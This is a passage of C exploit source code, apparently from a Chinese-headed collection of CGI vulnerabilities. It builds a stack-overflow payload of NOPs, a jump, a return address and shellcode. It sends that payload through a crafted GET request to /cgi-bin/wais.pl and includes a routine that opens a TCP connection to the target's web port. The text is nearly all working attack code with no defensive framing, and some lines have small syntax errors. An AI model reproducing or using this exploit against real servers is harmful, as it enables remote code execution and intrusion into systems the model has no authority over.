CGI漏洞(27) There are a few arbitrary bytes between them, therefore we jump over them with 0xeb 0x08 and land somewhere in the given NOPS */ memset(smash, 0x90, 7+align); /* Few nops on the stack - waisq ruins some bytes */ smash[7+align] = 0xeb; /* Jump over the EIP that we overflow */ smash[8+align] = 0x04; /* It‘s 4 bytes big */ /* Return address gets choked in here */ memcpy(smash+9+align, &retaddy, 4); smash[13+align] = 0x00; /* strcat() needs the delimiter */ strcat(smash, hellcode); /* Copy the shellcode */ sprintf(output, "GET /cgi-bin/wais.pl?-s+%s+-t+%s HTTP/1.0\n\n", source, smash); /* Stuff it all on the heap */ free(smash); return(output); /* And return the pointer there */ } /* Connects to a webserver "ip" is expected to be in network byte order */ int wwwconnect(unsigned long ip) { struct sockaddr_in sa; /* Sockaddr */ int sd; /* Socket Descriptor */ if((sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) { perror("socket()"; exit(-1); } memset(&sa, 0x00, sizeof(struct sockaddr_in)); sa.sin_port=htons(80); sa.sin_addr.s_addr=ip; if(connect(sd, &sa, sizeof(struct sockaddr_in)) == -1) { perror("connect()";